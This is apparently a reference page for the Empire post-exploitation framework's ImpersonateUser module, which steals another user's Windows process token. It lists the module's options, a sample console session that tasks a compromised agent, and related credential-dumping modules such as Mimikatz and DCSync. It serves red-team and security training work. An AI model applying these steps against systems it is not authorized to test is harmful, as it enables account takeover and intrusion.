ImpersonateUser - Empire Module
This page contains detailed information about how to use the csharp/Sharpsploit.Credentials/ImpersonateUser Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: ImpersonateUser
Module: csharp/Sharpsploit.Credentials/ImpersonateUser
Source code:
empire/server/modules/csharp/Sharpsploit.Credentials.Covenant.yaml#L334
Language: C#
Needs admin: No
OPSEC safe: No
Background: No
The ImpersonateUser module finds a process owned by the specified user and impersonate the token. Used to execute subsequent commands as the specified user.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the ImpersonateUser module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the ImpersonateUser module:
Agent
Agent to run module on.
DotNetVersion
.NET version to compile against.
Default value: Net35
.
Suggested values: Net35
, Net40
.
Username
User to impersonate. "DOMAIN\Username" format expected.
Default value: DOMAIN\Username
.
ImpersonateUser Example Usage
Here's an example of how to use the ImpersonateUser module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule csharp/Sharpsploit.Credentials/ImpersonateUser
Author cobbr_io
Background False
Description Find a process owned by the specified user and impersonate the token.
Used to execute subsequent commands as the specified user.
Language csharp
Name csharp/Sharpsploit.Credentials/ImpersonateUser
NeedsAdmin False
OpsecSafe False
,Record Options-,-----------------,----------,------------------------------------,
| Name | Value | Required | Description |
|---------------|-----------------|----------|------------------------------------|
| Agent | | True | Agent to run module on. |
|---------------|-----------------|----------|------------------------------------|
| DotNetVersion | Net35 | True | .NET version to compile against |
|---------------|-----------------|----------|------------------------------------|
| Username | DOMAIN\Username | True | User to impersonate. |
| | | | "DOMAIN\Username" format expected. |
'---------------'-----------------'----------'------------------------------------'
(Empire: usemodule/csharp/Sharpsploit.Credentials/ImpersonateUser) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/csharp/Sharpsploit.Credentials/ImpersonateUser) > set DotNetVersion Net35
[*] Set DotNetVersion to Net35
(Empire: usemodule/csharp/Sharpsploit.Credentials/ImpersonateUser) > set Username DOMAIN\Username
[*] Set Username to DOMAIN\Username
(Empire: usemodule/csharp/Sharpsploit.Credentials/ImpersonateUser) > execute
[!] Error: csharpserver plugin not running
Note: This module requires csharpserver plugin to be running on our system. If this plugin is not running, the error message "[!] Error: csharp server plugin not running
" is thrown on the console. To fix the error, start the csharpserver plugin and re-run the module:
(Empire: usemodule/csharp/Sharpsploit.Credentials/ImpersonateUser) > useplugin csharpserver
,Record Options--,----------,----------------------------------,
| Name | Value | Required | Description |
|--------|-------|----------|----------------------------------|
| status | start | True | Start/stop the Empire C# server. |
'--------'-------'----------'----------------------------------'
(Empire: useplugin/csharpserver) > execute
[*] Starting Empire C# server
(Empire: useplugin/csharpserver) > back
(Empire: usemodule/csharp/Sharpsploit.Credentials/ImpersonateUser) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
- cobbr_io
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/csharp/Sharpsploit.Credentials.Covenant.yaml#L334
- https://twitter.com/cobbr_io
See Also
Check also the following modules related to this module:
- csharp/Sharpsploit.Credentials/MakeToken
- csharp/Sharpsploit.Credentials/GetSystem
- csharp/Sharpsploit.Credentials/ImpersonateProcess
- csharp/Sharpsploit.Credentials/BypassUACGrunt
- csharp/Sharpsploit.Credentials/BypassUACCommand
- csharp/Sharpsploit.Credentials/RevertToSelf
- csharp/Sharpsploit.Credentials/LogonPasswords
- csharp/Sharpsploit.Credentials/LsaSecrets
- csharp/Sharpsploit.Credentials/LsaCache
- csharp/Sharpsploit.Credentials/SamDump
- csharp/Sharpsploit.Credentials/Wdigest
- csharp/Sharpsploit.Credentials/DCSync
- csharp/Sharpsploit.Credentials/Mimikatz
- csharp/Sharpsploit.Credentials/SafetyKatz
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.